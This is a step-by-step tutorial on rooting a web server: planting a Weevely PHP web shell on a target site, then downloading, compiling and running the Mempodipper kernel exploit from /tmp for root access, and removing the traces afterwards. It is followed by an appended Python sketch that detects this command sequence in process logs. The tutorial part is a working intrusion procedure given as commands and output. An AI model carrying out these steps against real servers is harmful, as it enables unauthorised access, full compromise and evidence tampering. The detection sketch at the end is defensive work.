Root a server with Weevely
Weevely to root tutorial
wget https://github.com/downloads/epinna/Weevely/weevely-0.7.1.tar.gz
tar -zxvf weevely-0.7.1.tar.gz
cd to the new dir
now type ./weevely.py generate
e.g. ./weevely.py generate Password123
this will create a weevely.php file in your current dir
If you're still unsure, there is an in-depth tutorial at https://github.com/epinna/Weevely/wiki/Tutorial
Once you have uploaded your weevely.php file to the target server and you know which dir it is located in, we go on to the next step
connecting to your backdoor
./weevely.py http://www.targetsite.com/dir/weevely.php
The password is the one you chose when making the backdoor
Should look like this:
user@IMNOTAPC:~$ ./weevely.py http://xxxxx.xx/weevely.php Password123
________ __
| | | |-----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|_____|____|___/|____|__|___ | v0.7.1
|_____|
Stealth tiny web shell
[+] Starting terminal, shell probe may take a while
[+] List modules with and show help with :show [module name]
Now that we have the backdoor, it's time to find out the Linux kernel version
type:
uname -a
response:
Linux xxxxxxxx.miniserver.com 2.6.39.4-x1 #1 SMP Wed Oct 26 11:39:05 GMT 2011 i686 GNU/Linux
Note the kernel version is 2.6.39. There is a local root exploit for this, so we can google
"2.6.39 local root exploit"
there is one on exploit-db
now I go back to my shell then type:
cd /tmp
This is because /tmp is normally world-writable, so the file can be written there
and type:
wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
then type:
gcc -o test mempodipper.c
replace mempodipper.c with the exploit suited to your server
now to set permissions:
chmod u+x test
now to run:
./test
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x8049984.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/411/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x8049978.
[+] Executing su with shellcode.
root@xxxxx.miniserver.com:#
YOU HAVE ROOT :D
don't forget to delete them
rm -r
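Seen from the defending side, the steps above leave a recognisable process trail: children of the web server running uname, wget, gcc, chmod and then a binary out of /tmp. The detection sketch below is an added example, not part of the original tutorial; the log format, the web server process names and the sample lines are constructed assumptions.

```python
import re

# Constructed process-execution records (not from the page), one per line:
# <epoch> user=<account> parent=<parent process> cwd=<dir> cmd=<command line>
SAMPLE_LOG = """\
1327140001 user=www-data parent=apache2 cwd=/var/www/dir cmd=uname -a
1327140050 user=www-data parent=apache2 cwd=/tmp cmd=wget http://example.invalid/poc.c
1327140061 user=www-data parent=apache2 cwd=/tmp cmd=gcc -o test poc.c
1327140065 user=www-data parent=apache2 cwd=/tmp cmd=chmod u+x test
1327140070 user=www-data parent=apache2 cwd=/tmp cmd=./test
1327140300 user=deploy parent=sshd cwd=/home/deploy cmd=gcc -o app main.c
"""

WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "php-cgi"}  # assumed names
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")  # world-writable by default
LINE = re.compile(r"(\d+) user=(\S+) parent=(\S+) cwd=(\S+) cmd=(.+)")

def in_scratch(cwd):
    return any(cwd == d or cwd.startswith(d + "/") for d in SCRATCH_DIRS)

def classify(cwd, cmd):
    """Return the stage of the sequence this command matches, or None."""
    argv = cmd.split()
    prog = argv[0].rsplit("/", 1)[-1]
    if prog == "uname":
        return "recon"
    if prog in ("wget", "curl"):
        return "download"
    if prog in ("gcc", "cc", "clang"):
        return "compile"
    if prog == "chmod" and in_scratch(cwd):
        return "chmod"
    if argv[0].startswith("./") and in_scratch(cwd):
        return "exec-from-scratch-dir"
    return None

def detect(log, threshold=3):
    """Return {account: [stages]} for web-server children hitting >= threshold stages."""
    seen = {}
    for line in log.splitlines():
        m = LINE.fullmatch(line.strip())
        if not m or m.group(3) not in WEB_PARENTS:
            continue
        stage = classify(m.group(4), m.group(5))
        if stage and stage not in seen.setdefault(m.group(2), []):
            seen[m.group(2)].append(stage)
    return {user: stages for user, stages in seen.items() if len(stages) >= threshold}

if __name__ == "__main__":
    for user, stages in detect(SAMPLE_LOG).items():
        print(f"ALERT {user}: {' -> '.join(stages)}")
```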